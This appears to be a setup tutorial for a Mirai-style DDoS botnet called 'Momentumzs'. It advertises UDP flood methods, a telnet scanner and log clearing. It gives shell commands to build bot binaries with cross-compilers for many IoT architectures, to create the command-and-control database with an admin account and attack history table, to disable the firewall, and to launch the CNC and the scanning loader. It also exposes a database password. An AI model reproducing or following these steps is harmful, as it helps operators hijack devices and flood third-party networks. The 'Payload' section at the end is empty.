TUTORIAL




Function:

DDoS Panel for user who can't type a command correctly.
New attacks methods with personnal Gaming-Hex Payload
OVHUDP Methods
Multiple UDP PayloadMix Method
ClearLogs
Start TelnetScanner or Disable
Full Logs in Servers(debug logs)




Server DB Pass: Lkhdkjg#D65_Jmjk#



yum update -y 
yum install epel-release -y 
yum groupinstall "Development Tools" -y 
yum install gmp-devel -y 
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10 
yum install screen wget bzip2 gcc nano htop tcpdump dstat vnstat speedtest-cli python-pip gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y //Install most lib
echo "Setting Up Golang"

rm -rf /usr/local/go 
wget https://dl.google.com/go/go1.14.2.linux-amd64.tar.gz 
sha256sum go1.14.2.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.14.2.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin 
source ~/.bash_profile 
rm -rf go1.14.2.linux-amd64.tar.gz

echo "Setting Up Compiler"
mkdir /etc/xcompile 
cd /etc/xcompile
wget https://github.com/foss-for-synopsys-dwc-arc-processors/toolchain/releases/download/arc-2017.09-release/arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2
wget https://landley.net/aboriginal/downloads/binaries/cross-compiler-i486.tar.gz
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc-440fp.tar.bz2

tar -xvf cross-compiler-i486.tar.gz
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-i686.tar.bz2
tar -jxf cross-compiler-x86_64.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
tar -vxf arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
tar -jxf cross-compiler-powerpc-440fp.tar.bz2

rm -rf *.tar.bz2 
mv cross-compiler-i486 i486
mv cross-compiler-i686 i686
mv cross-compiler-i586 i586
mv cross-compiler-x86_64 x86_64
mv cross-compiler-sh2elf sh2elf
mv cross-compiler-sh2eb sh2eb
mv cross-compiler-sh4 sh4
mv cross-compiler-m68k m68k 
mv cross-compiler-mips mips 
mv cross-compiler-mipsel mipsel 
mv cross-compiler-powerpc powerpc
mv cross-compiler-powerpc-440fp powerpc-440fp  
mv cross-compiler-sparc sparc 
mv cross-compiler-armv4l armv4l 
mv cross-compiler-armv5l armv5l 
mv cross-compiler-armv6l armv6l 
mv cross-compiler-armv7l armv7l
mv arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux arc

cd /tmp 
wget https://storage.googleapis.com/golang/go1.14.1.linux-amd64.tar.gz -q 
tar -xzf go1.14.1.linux-amd64.tar.gz
mv go /usr/local/go
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords
cd ~/



=========================================================================

Change Main.go (cnc)

Change IP's:
Go to sublime and Ctrl+H change all the 69.69.69.420 IPS


=========================================================================
Install mysql: (or go https://www.digitalocean.com/community/tutorials/how-to-install-mysql-on-centos-8-fr)
service mysqld start; mysql_secure_installation

Log into mysql:
mysql -proot

=========================================================================

CREATE DATABASE Momentumzs;
use Momentumzs;

CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);
INSERT INTO users VALUES (NULL, 'badwolf', 'wolf', 0, 0, 0, 0, -1, 1, 30, '');

CREATE TABLE `logins` (
  `id` int(11) NOT NULL,
  `username` varchar(32) NOT NULL,
  `action` varchar(32) NOT NULL,
  `ip` varchar(15) NOT NULL,
  `timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
exit;


=========================================================================

cd ~/; chmod 0777 * -R; sh build.sh

=========================================================================

nano /usr/include/bits/typesizes.h

edit 1024 to 99999
THEN SAVE IT 
ulimit -n999999; ulimit -u999999; ulimit -e999999

=========================================================================
iptables -F; service iptables stop; chkconfig iptables off; screen ./cnc

cd loader; screen ./scanListen
=========================================================================
PHPMyAdmin:

yum update -y && yum install httpd php wget nano -y && service iptables stop && chkconfig iptables off; sudo yum install epel-release -y; yum update; yum install httpd mysql-server php  -y; service mysql start; yum install php; yum install phpmyadmin -y; 

nano /etc/httpd/conf.d/phpMyAdmin.conf 
=========================================================================
service http restart
=========================================================================
=========================================================================
Payload: 

=========================================================================


